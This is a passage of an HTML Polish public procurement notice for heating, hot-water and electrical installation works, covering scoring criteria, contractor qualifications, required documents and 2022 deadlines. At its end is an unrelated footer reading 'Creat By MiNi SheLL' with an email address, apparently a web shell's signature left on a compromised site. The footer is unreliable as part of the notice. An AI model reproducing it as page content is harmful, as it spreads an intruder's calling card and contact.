zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY<br/>WYBORZE OFERTY, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU<br/>OCENY OFERT<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich<br/>wagami:<br/>L.p. Kryterium<br/>Znaczenie<br/>procentowe<br/>kryterium<br/>Maksymalna ilość<br/>punktów jakie może<br/>otrzymać oferta za<br/>dane kryterium<br/>1. Cena oferty (C) 60% 60<br/>2. Gwarancja (G) 10% 10<br/>3. Termin realizacji robót (T) 30% 30<br/>Cena ofert (C)<br/>W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z<br/>przybliżeniem dziesiętnym ilość punktów wynikającą z działania:<br/>Oferta z najniższą ceną<br/>------------------------------------- x 60 pkt.<br/>Cena oferty badanej<br/>Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r.<br/>o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178)<br/>Wydłużenie okresu gwarancji (G)<br/>W przypadku kryterium &#34;wydłużenie okresu gwarancji&#34; do oceny będzie brana pod uwagę gwarancja<br/>zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ.<br/>Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji.<br/>Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób:<br/>G = 0, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany),<br/>G = 5, jeżeli wykonawca zaoferuje 54 miesięcy gwarancji,<br/>G = 10, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji.<br/>W przypadku, gdy wykonawca zaoferuje gwarancję, pomiędzy przedziałami określonymi powyżej<br/>zamawiający przyzna punkty w ilości odpowiadającej dolnej wartości przedziału (np. w przypadku<br/>zaoferowania 25 miesięcy gwarancji wykonawca otrzyma 0 pkt, w przypadku zaoferowania 50 miesięcy<br/>gwarancji wykonawca otrzyma 5 pkt, 54 i powyżej 10 pkt)<br/>Do umowy przyjęty zostanie okres gwarancji faktycznie zaoferowany przez wykonawcę w ofercie.<br/>Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z<br/>wymaganiami określonymi w SWZ.<br/>Udzielana przez wykonawcę gwarancja winna być bezwarunkowa i wykonalna. Wzór karty gwarancyjnej<br/>stanowi integralną część Załącznika nr 2 do SWZ.<br/>Termin realizacji robót (T)<br/>W przypadku kryterium &#34;termin realizacji robót&#34; do oceny będzie brany pod uwagę termin zadeklarowany<br/>przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany<br/>jest do wykonania robót w maksymalnym terminie 8 miesięcy od dnia podpisania Umowy.<br/>Zamawiający przyzna punkty za skrócenie terminu realizacji robót w następujący sposób:<br/>T = 0, jeżeli wykonawca zaoferuje 5 miesięcy (termin maksymalny wymagany),<br/>T = 15, jeżeli wykonawca zaoferuje 4 miesiące,<br/>T = 30, jeżeli wykonawca zaoferuje 3 miesiące,<br/>Zamawiający nie dopuszcza wskazywania terminów realizacji robót innych niż wskazane powyżej.<br/>Wykonawca, który zaoferuje inne niż wskazane powyżej wartości, otrzyma 0 punktów w niniejszym<br/>kryterium.<br/>W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu<br/>z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem:<br/>PO = C + G + T<br/>gdzie:<br/>PO – liczba punktów przyznanych ofercie<br/>C – liczba punktów w kryterium „cena oferty”<br/>G – liczba punktów w kryterium „gwarancja”<br/>T – liczba punktów w kryterium „termin”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca<br/>ubiegający się o udzielenie zamówienia, wykaże, że:<br/>a) wykonał należycie i prawidłowo ukończył co najmniej:<br/>− W przypadku składania oferty dla części I postępowania – dwie roboty budowlane polegające<br/>na wykonaniu instalacji c.o. i c.w.u. – o wartości nie mniejszej niż 800 000,00 zł brutto każda.<br/>− W przypadku składania oferty dla części II postępowania – dwie roboty budowlane<br/>polegające na wykonaniu instalacji c.o. i c.w.u. – o wartości nie mniejszej<br/>niż 1 000 000,00 zł brutto każda.<br/>− W przypadku składania oferty dla wszystkich części postępowania – dwie roboty budowlane<br/>polegające na wykonaniu instalacji c.o. i c.w.u. – o wartości nie mniejszej niż 800 000,00 zł brutto<br/>każda oraz dwie roboty budowlane polegające na wykonaniu instalacji c.o. i c.w.u. – o wartości<br/>nie mniejszej niż 1 000 000,00 zł brutto każda.<br/>UWAGA: W przypadku, gdy wartość zamówień wykazanych przez wykonawcę celem potwierdzenia<br/>spełniania warunków udziału w postępowaniu wyrażona będzie w walucie obcej, zamawiający przeliczy<br/>tę wartość na walutę polską w oparciu o średni kurs walut NBP, dla danej waluty, z daty wszczęcia<br/>postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, zamawiający przyjmie kurs<br/>średni z ostatniej tabeli przed wszczęciem postępowania.<br/>UWAGA: W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym<br/>zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo roboty, o których mowa<br/>powyżej.<br/>b) dysponuje lub będzie dysponował i skieruje do realizacji zamówienia:<br/>− co najmniej 1 osobę w roli kierownika budowy - posiadającą uprawnienia bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi, lub inne<br/>uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w<br/>aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej specjalności.<br/>− co najmniej 1 osobę w roli kierownika robót - posiadającą uprawnienia bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi, lub inne<br/>uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w<br/>aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej specjalności.<br/>− co najmniej 1 osobę w roli kierownika robót - posiadającą uprawnienia budowlane bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności,<br/>do wykonywania których w aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej<br/>specjalności.<br/>UWAGA: W przypadku Wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do<br/>zdobytych w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane.<br/>UWAGA: Zgodnie z art. 12 ust. 7 ustawy Prawo budowlane, podstawę do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a ustawy Prawo budowlane oraz – zgodnie z odrębnymi przepisami wpis<br/>na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez<br/>tę izbę, z określonym w nim terminem ważności.<br/>UWAGA: Zamawiający dopuszcza możliwość łączenia funkcji, w przypadku osób, które posiadają<br/>uprawnienia w więcej niż jednej specjalności.<br/>UWAGA: Zamawiający dopuszcza możliwość, by jedna osoba pełniła funkcję w stosunku do<br/>poszczególnych części zamówienia w przypadku, kiedy oferta składana jest na więcej niż jedną część<br/>zamówienia.<br/>c) posiada średnioroczne zatrudnienie w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w wysokości co najmniej:11<br/>pracowników.<br/>UWAGA: Przez zatrudnienie rozumie się stosunek pracy zdefiniowany w art. 22 §. 1 ustawy z dnia 26<br/>czerwca 1974 r. Kodeks pracy<br/>2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie<br/>spełnia, w oparciu o złożone dokumenty i oświadczenia.<br/>3. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać na<br/>potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot trzeci, na<br/>potencjał, którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w<br/>postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz 109 ust.1 pkt 4 ustawy<br/>Pzp <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 Ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp. Dokument<br/>winien być wystawiony nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>2) od wykonawcy, który powołuje się na zasoby podmiotów trzecich, przedstawienia, w odniesieniu do<br/>tych podmiotów, podmiotowych środków dowodowych określonych w ust. 6 pkt 1) powyżej oraz<br/>spełnienia - w zakresie, w jakim wykonawca powołuje się na jego zasoby - warunki udziału w<br/>postępowaniu – jeżeli wykonawca polega na zasobach podmiotu trzeciego;<br/>3) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi<br/>stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o<br/>tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>4) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych/uprawnień niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami – załącznik nr 6 do SWZ;<br/>5) oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy w ostatnich 3<br/>latach, a w przypadku, gdy okres prowadzenia działalności jest krótszy – w tym okresie – załącznik<br/>nr 7 do SWZ.<br/>6) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do<br/>tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (t.j. Dz. U. z 2021 r., poz. 275), z innym Wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej –<br/>wzór stanowi załącznik nr 8 do SWZ.<br/>7. Jeżeli Wykonawca nie złoży podmiotowych środków dowodowych lub złożone podmiotowe środki<br/>dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym w<br/>wezwaniu terminie.<br/>8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o których mowa w ust. 6 pkt 1, składa dokument lub dokumenty wystawione w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego<br/>likwidacji ani nie ogłoszono upadłości - w zakresie określonym w art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>Dokument powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Na podstawie art. 273 Ustawy Pzp zamawiający żąda podmiotowych środków dowodowych na<br/>potwierdzenie:<br/>1) braku podstaw do wykluczenia<br/>2) spełnienia warunków udziału w postępowaniu<br/>2. Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu w zakresie wskazanym w rozdziale VI ust. 1 i VII ust. 1 SWZ – Załącznik nr 4.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe<br/>środki dowodowe, wskazane w ust. 6 niniejszego rozdziału.<br/>3. Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4. Oświadczenie składają odrębnie:<br/>a) wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu;<br/>b) podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>podmiot udostępnia swoje zasoby wykonawcy.<br/>5. Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 lub art. 109 ust. 1 pkt<br/>4 ustawy Pzp, wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił łącznie<br/>następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub<br/>swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując<br/>odpowiednio z właściwymi organami, w tym organami ścigania lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania<br/>dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe<br/>postępowanie wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów,<br/>wewnętrznych regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za<br/>nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/>Zamawiający ocenia, czy podjęte przez wykonawcę czynności są wystarczające do wykazania jego<br/>rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że nie są<br/>wystarczające, wyklucza wykonawcę</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do wspólnej reprezentacji (wszyscy uczestnicy<br/>ubiegający się o udzielenie zamówienia w charakterze Wykonawcy) w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>b) Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>c) W przypadku, o którym mowa w art. 117 ust. 3 ustawy, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117<br/>ust. 4 ustawy z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy w przypadkach i na warunkach określonych w § 15 wzoru<br/>umowy, stanowiącym Załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com